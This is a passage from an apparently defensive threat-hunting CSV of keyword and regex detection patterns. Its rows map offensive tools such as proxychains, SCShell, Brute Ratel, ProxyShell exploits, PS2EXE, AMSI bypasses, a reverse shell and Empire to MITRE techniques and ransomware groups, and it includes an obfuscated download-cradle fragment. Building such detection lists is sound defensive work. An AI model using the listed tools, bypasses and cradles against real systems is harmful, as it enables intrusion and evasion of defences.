wmiexec.py*",".{0,1000}proxychains\swmiexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55638" "*proxychains*scshell*",".{0,1000}proxychains.{0,1000}scshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira 
- APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","55639" "*proxychains.conf*",".{0,1000}proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55640" "*proxychains.lsm*",".{0,1000}proxychains\.lsm.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55641" "*proxychains.sourceforge.net*",".{0,1000}proxychains\.sourceforge\.net.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55642" 
"*proxychains_proxy_count*",".{0,1000}proxychains_proxy_count.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55643" "*proxychains4 -q * smb 1*",".{0,1000}proxychains4\s\-q\s.{0,1000}\ssmb\s1.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","used by Dispossessor ransomware group to scan with crackmapexec and other tools","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55644" "*proxychains4*",".{0,1000}proxychains4.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55645" "*proxychains-master*",".{0,1000}proxychains\-master.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to 
follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55646" "*proxychains-other.conf*",".{0,1000}proxychains\-other\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55647" "*ProxyCommand=nc -lp 8080 -s 127.0.0.1*",".{0,1000}ProxyCommand\=nc\s\-lp\s8080\s\-s\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","55648" "*Proxy-DLL-Loads*",".{0,1000}Proxy\-DLL\-Loads.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black 
Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55649" "*proxyDllLoads.c*",".{0,1000}proxyDllLoads\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55650" "*proxyDllLoads.exe*",".{0,1000}proxyDllLoads\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55651" "*proxyLogon.py*",".{0,1000}proxyLogon\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55652" 
"*proxyresolv *",".{0,1000}proxyresolv\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","55653" "*proxyshell.py*",".{0,1000}proxyshell\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55654" "*proxyshell_rce.py*",".{0,1000}proxyshell_rce\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","10","","N/A","","","","55655" "*proxyshellcodeurl*",".{0,1000}proxyshellcodeurl.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","55656" "*proxyshell-enumerate.py*",".{0,1000}proxyshell\-enumerate\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation 
tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","10","","N/A","","","","55657" "*proxyshell-poc*",".{0,1000}proxyshell\-poc.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","10","","N/A","","","","55658" "*ps.AddScript(Encoding.UTF8.GetString(Convert.FromBase64String(script)*",".{0,1000}ps\.AddScript\(Encoding\.UTF8\.GetString\(Convert\.FromBase64String\(script\).{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","55659" "*ps_token2john.py*",".{0,1000}ps_token2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55660" "*ps_wmi_exec.rb*",".{0,1000}ps_wmi_exec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55661" "*'ps'+':'+'/'+'/'+'cutt.ly/syFzIL*",".{0,1000}\'ps\'\+\'\:\'\+\'\/\'\+\'\/\'\+\'cutt\.ly\/syFzIL.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","55662" "*PS1ToEXE*PS2EXE.ps1*",".{0,1000}PS1ToEXE.{0,1000}PS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","55663" "*ps2exe -*",".{0,1000}ps2exe\s\-.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to 
executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55664" "*ps2exe *.ps1*.exe*",".{0,1000}ps2exe\s.{0,1000}\.ps1.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55665" "*PS2EXE -content $* -outputFile *",".{0,1000}PS2EXE\s\-content\s\$.{0,1000}\s\-outputFile\s.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","55666" "*ps2exe.ps1*",".{0,1000}ps2exe\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55667" "*ps2exe.psd1*",".{0,1000}ps2exe\.psd1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55668" "*ps2exe.psm1*",".{0,1000}ps2exe\.psm1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation 
tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55669" "*PS2EXE-master*",".{0,1000}PS2EXE\-master.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55670" "*PSAmsiClient.ps1*",".{0,1000}PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","55671" "*PSAmsiScanner.ps1*",".{0,1000}PSAmsiScanner\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","55672" "*PSAsyncShell by @JoelGMSec*",".{0,1000}PSAsyncShell\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","55673" "*PSAttack*",".{0,1000}PSAttack.{0,1000}","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self-contained custom PowerShell console. It's designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. 
It does this in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55674" "*PSAttack.exe*",".{0,1000}PSAttack\.exe.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","55675" "*PSAttack.Resources.BuildDate.txt*",".{0,1000}PSAttack\.Resources\.BuildDate\.txt.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","55676" "*PSByPassCLM*",".{0,1000}PSByPassCLM.{0,1000}","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","N/A","4","389","52","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z","55678" "*PSCMD channel was either not defined while connecting OR the channel name is not the default.*",".{0,1000}PSCMD\schannel\swas\seither\snot\sdefined\swhile\sconnecting\sOR\sthe\schannel\sname\sis\snot\sthe\sdefault\..{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command 
line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","55680" "*pscmd/serverscript.ps1*",".{0,1000}pscmd\/serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","55681" "*pscmd\serverscript.ps1*",".{0,1000}pscmd\\serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","55682" "*PSconfusion.py*",".{0,1000}PSconfusion\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","55683" "*pse2john.py*",".{0,1000}pse2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55685" "*ps-empire client*",".{0,1000}ps\-empire\sclient.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - 
T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55686" "*ps-empire server*",".{0,1000}ps\-empire\sserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - 